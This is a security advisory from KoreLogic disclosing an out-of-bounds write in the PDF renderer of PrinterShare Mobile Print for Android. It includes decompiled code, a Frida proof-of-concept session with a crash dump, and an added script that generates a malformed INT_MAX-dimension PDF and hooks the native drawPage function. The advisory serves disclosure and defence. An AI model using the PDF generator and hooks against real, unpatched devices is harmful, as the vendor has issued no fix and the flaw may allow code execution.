Security Advisory

Mobile Dynamix PrinterShare Mobile Print Out-of-bounds Write

Advisory ID
KL-001-2025-004
Published
2025-05-22
Vendor
Mobile Dynamix

Affected Systems

Product
PrinterShare Mobile Print
Version
up to 12.15.01
Platform
Android

Discovered By

Felix Segoviano (KoreLogic)

Vulnerability Details

Affected Vendor: Mobile Dynamix
Affected Product: PrinterShare Mobile Print
Affected Version: up to 12.15.01
Platform: Android
CWE Classification: CWE-787: Out-of-bounds Write
CVE ID: CVE-2025-5099

Vulnerability Description

An out-of-bounds write occurs in the native library when it renders a crafted PDF. The resulting memory corruption can be exploited to crash the application and potentially to achieve arbitrary code execution.

Technical Description

The ActivityPrintDocuments class renders PDF files through JNI calls into the native library libpdfrender.so. The vulnerability lies in that native rendering code and is triggered by a PDF whose page dimensions and object structure have been manipulated.

The vulnerability is reachable through the ActivityPrintDocuments class, which is launched when a PDF file is opened. Rendering happens in the inner class j (a subclass of h), whose a(Canvas, boolean) method calls the vulnerable native function PDFrender.drawPage:

  // From activityprintdocuments.java
  class j extends h {
      @Override
      public void a(Canvas canvas, boolean z2) {
          // ...
          int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap);
          // ...
      }
  }

The native function in the shared object stores through a pointer loaded from its input structure (base_addr + 0x90) without validating it, so a crafted document can steer where the writes land. The decompiled fragment below shows the unchecked stores:

  undefined8 entry(long base_addr, int flag, char option) {
    // ...
    temp_long = *(long *)(base_addr + 0x90);
    *(undefined4 *)(temp_long + 0x18) = 0;
    // ... [Insufficient bounds checking on pointers]
    *(undefined8 *)(temp_long + 0x28) = 0;
    *(undefined8 *)(temp_long + 0x20) = 0;
    *(ulong *)(temp_long + 0x10) = temp_ulong;
    // ...
  }

The proof-of-concept Frida script hooks the Java rendering path (ActivityPrintDocuments$g.run, $h.a and $j.a) and the native functions in libpdfrender.so, in particular the JNI export Java_com_dynamixsoftware_printershare_PDFrender_drawPage. It writes a malformed PDF whose dimensions are set to 0x7FFFFFFF (INT_MAX) so that the renderer's size calculations run out of range, then launches the application on that file. When the native drawPage function is entered with the resulting parameters, the native code corrupts memory. In the session below the hook additionally overwrites the object's vtable pointer with 0x41 ("A") bytes; the tombstone's fault address 0x0041414141414000 (x21 holds the full value 0x4141414141414000) is that overwritten pointer, which confirms that the native code dereferences it on the render thread (Thread-17) and faults with SIGSEGV/SEGV_MAPERR.

  $ frida -U -f com.dynamixsoftware.printershare -l exploit.js
   ____
      / _  |   Frida 16.6.5 - A world-class dynamic instrumentation toolkit
     | (_| |
      > _  |   Commands:
     /_/ |_|       help      -> Displays the help system
     . . . .       object?   -> Display information about 'object'
     . . . .       exit/quit -> Exit
     . . . .
     . . . .   More info at https://frida.re/docs/home/
     . . . .
     . . . .   Connected to SM T220 (id=R83X10JATAV)
  Spawning `com.dynamixsoftware.printershare`...
  Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
  [SM T220::com.dynamixsoftware.printershare ]-> [!] Terminal exploitation initialized
  [!] Initiating terminal exploit sequence
  [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
  [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$h.a
  [*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$j.a
  [!] Creating terminal exploit PDF
  [+] Using existing exploit PDF
  [!] Launching with payload at /sdcard/Download/terminal_exploit.pdf
  [!] Called com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
  [+] Found libpdfrender.so at 0x75521e4000
  [!] Found critical function pointer: 0x75521e4e98
  ...SNIP...

  [!] Target function called
  [*] Original pageNum: 0x76b5496bc0
  [-] Error modifying dimensions: Error: access violation accessing 0x0
  [*] Flags changed: 0 -> 2065
  [!] Called critical function: 0xb4000075790586a0
  [*] Potential vtable: 0xb4000075790586a0 -> 0x762801f5a0
  [!] Overwrote potential vtable with "AAAAAAAA"
  [!] MEMORY MODIFIED at 0xb4000075790586a0 (vtable pointer):
  BEFORE:
  00000000  a0 f5 01 28 76 00 00 00                          ...(v...
  AFTER:
  00000000  00 40 41 41 41 41 41 41                          .@AAAAAA
  [!] Corrupted 64-byte memory chunk starting at object
  [!] MEMORY MODIFIED at 0xb4000075790586a0 (object memory):
  BEFORE:
  00000000  00 40 41 41 41 41 41 41 00 b8 e3 78 75 00 00 b4  .@AAAAAA...xu...
  00000010  80 03 e9 29 76 00 00 b4 00 00 00 00 00 00 00 00  ...)v...........
  00000020  80 00 00 00 fc ff ff ff 00 fe 3f d0 76 00 00 00  ..........?.v...
  00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  AFTER:
  00000000  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  00000010  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  00000020  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  00000030  00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41  .@AAAAAA.@AAAAAA
  [!] Target function returned: 0xffffffff
  [-] Post-function corruption error: Error: invalid operation
  Process crashed: Bad access due to invalid address

  ***
  *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
  Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
  Revision: '0'
  ABI: 'arm64'
  Processor: '4'
  Timestamp: 2025-03-03 09:31:59.556177436-0800
  Process uptime: 4s
  Cmdline: com.dynamixsoftware.printershare
  pid: 31838, tid: 32000, name: Thread-17  >>> com.dynamixsoftware.printershare <<<
  uid: 10243
  signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414000
      x0  b4000075790586a0  x1  0000000000000003  x2  0000000000000000  x3  0000000000000000
      x4  0000000000000000  x5  0000000000000000  x6  0000000000000000  x7  0000000000000000
      x8  0000000000004200  x9  0000007627bdd114  x10 0000007553d43d50  x11 0000007553d43cd0
      x12 0000000000000008  x13 00000076c4d36f78  x14 0000000000000010  x15 00000076d2300a00
      x16 000000761084cf48  x17 00000076cd911f30  x18 0000000000000000  x19 0000000000000003
      x20 b4000075790586a0  x21 4141414141414000  x22 000000760f393a40  x23 0000007553d47000
      x24 0000000000000010  x25 00000076d22fe840  x26 0000000000000002  x27 0000007553d43ed0
      x28 0000000000000010  x29 0000007553d43d40
      lr  000000760fb92440  sp  0000007553d43d00  pc  0000007627bdd168  pst 0000000060000000
 ...SNIP...
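The malformed-PDF construction and the hooks that the paragraph above the session describes, written out as an added example in the form of a Frida script. This is not the advisory's PoC (linked below) and not the vendor's code: the JNI export and Java method names are taken from the session log, while the 32-bit size arithmetic, the MAX_DIM limit and the minimal PDF layout are this example's own assumptions, illustrating why INT_MAX page dimensions are hazardous rather than stating the exact fault inside libpdfrender.so.

```javascript
// Added example, not the KoreLogic PoC (KL-001-2025-004.poc.js.txt).
// It (1) builds a PDF whose page size is INT_MAX x INT_MAX, (2) shows the
// 32-bit size arithmetic such a page defeats in a naive renderer, beside the
// check a renderer should apply, and (3) when loaded by Frida, hooks the JNI
// export and Java methods named in the advisory. The size arithmetic is a
// generic illustration of why INT_MAX dimensions are dangerous, not the
// confirmed root cause inside libpdfrender.so; MAX_DIM is an assumed limit.

const INT_MAX = 0x7fffffff;

// Minimal single-page PDF with the requested MediaBox. The xref table is
// computed from real byte offsets so a strict parser still accepts the file.
function buildPdf(width, height) {
  const objs = [
    '<< /Type /Catalog /Pages 2 0 R >>',
    '<< /Type /Pages /Kids [3 0 R] /Count 1 >>',
    `<< /Type /Page /Parent 2 0 R /MediaBox [0 0 ${width} ${height}] ` +
      '/Contents 4 0 R >>',
    '<< /Length 0 >>\nstream\n\nendstream',
  ];
  let out = '%PDF-1.4\n';
  const offsets = [];
  objs.forEach((body, i) => {
    offsets.push(out.length);               // ASCII only, so length == bytes
    out += `${i + 1} 0 obj\n${body}\nendobj\n`;
  });
  const xref = out.length;
  out += `xref\n0 ${objs.length + 1}\n0000000000 65535 f \n`;
  for (const off of offsets) out += `${String(off).padStart(10, '0')} 00000 n \n`;
  out += `trailer\n<< /Size ${objs.length + 1} /Root 1 0 R >>\n` +
    `startxref\n${xref}\n%%EOF\n`;
  return out;
}

// Page size as a renderer would read it back from the first MediaBox.
function parseMediaBox(pdf) {
  const m = /\/MediaBox\s*\[\s*(-?\d+)\s+(-?\d+)\s+(-?\d+)\s+(-?\d+)\s*\]/.exec(pdf);
  if (!m) return null;
  const [x0, y0, x1, y1] = m.slice(1, 5).map(Number);
  return { width: x1 - x0, height: y1 - y0 };
}

// Bitmap byte count as 32-bit C int arithmetic computes it (Math.imul wraps
// exactly like a signed int multiply) versus the true value.
function bitmapBytes(width, height, bpp = 4) {
  const naive32 = Math.imul(Math.imul(width, height), bpp);
  const exact = BigInt(width) * BigInt(height) * BigInt(bpp);
  return { naive32, exact, overflowed: BigInt(naive32) !== exact };
}

// The check a renderer should apply before sizing a buffer: reject
// non-positive or implausibly large pages and any byte count that does not
// fit in a 32-bit int.
const MAX_DIM = 20000;  // assumed sanity limit, roughly 200 inches at 100 dpi
function validateDimensions(width, height, bpp = 4) {
  if (!Number.isInteger(width) || !Number.isInteger(height)) return false;
  if (width <= 0 || height <= 0 || width > MAX_DIM || height > MAX_DIM) return false;
  return BigInt(width) * BigInt(height) * BigInt(bpp) <= BigInt(INT_MAX);
}

// Hooks, installed only when this file runs inside Frida 16:
//   frida -U -f com.dynamixsoftware.printershare -l this_file.js
const JNI_DRAWPAGE = 'Java_com_dynamixsoftware_printershare_PDFrender_drawPage';
const JAVA_HOOKS = [
  ['com.dynamixsoftware.printershare.ActivityPrintDocuments$g', 'run'],
  ['com.dynamixsoftware.printershare.ActivityPrintDocuments$j', 'a'],
];

function installHooks() {
  const mod = Process.findModuleByName('libpdfrender.so');
  const target = mod ? mod.findExportByName(JNI_DRAWPAGE) : null;
  if (target === null) {
    console.log('[-] libpdfrender.so / drawPage not loaded yet');
  } else {
    // JNI layout: args[0] = JNIEnv*, args[1] = jclass, then the Java params
    // (doc handle, int[], float[], int, Bitmap) seen in ActivityPrintDocuments$j.a.
    Interceptor.attach(target, {
      onEnter(args) {
        console.log('[!] drawPage(doc=' + args[2] + ', iArr=' + args[3] +
          ', fArr=' + args[4] + ', i=' + args[5].toInt32() + ', bitmap=' + args[6] + ')');
      },
      onLeave(retval) { console.log('[!] drawPage returned ' + retval.toInt32()); },
    });
  }
  Java.perform(() => {
    for (const [cls, name] of JAVA_HOOKS) {
      Java.use(cls)[name].overloads.forEach((m) => {
        m.implementation = function (...a) {
          console.log('[*] ' + cls + '.' + name + ' called');
          return m.call(this, ...a);
        };
      });
    }
  });
}

if (typeof Java !== 'undefined' && typeof Interceptor !== 'undefined') installHooks();
```

Under Node.js only the pure functions run, which is enough to inspect the generated file (buildPdf(0x7fffffff, 0x7fffffff)) and to see that a naive width * height * 4 for that page wraps to 4 bytes, so a renderer that trusts the MediaBox would allocate almost nothing and then draw a full page into it. Under Frida the hooks install at load; because libpdfrender.so is loaded lazily (the PoC session only finds it after ActivityPrintDocuments$g.run has run), call installHooks() again from inside the $g.run hook or attach after the document has been opened.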

Mitigation and Remediation Recommendation

The vendor did not respond. No mitigation is known for end users of the affected application versions. Because the flaw is triggered only when the application renders an attacker-supplied PDF, not opening untrusted PDF files in PrinterShare Mobile Print reduces exposure until a fixed version is available.

Credit

This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.

Proof of Concept

URL: https://www.korelogic.com/advisories/KL-001-2025-004.poc.js.txt

SHA256sum: 8f1df24eb0027d8bfc13092988839c5f8a3fb39a57912d338af719b23d253b2c

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.

KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.

KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.

KoreLogic public disclosure.

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable
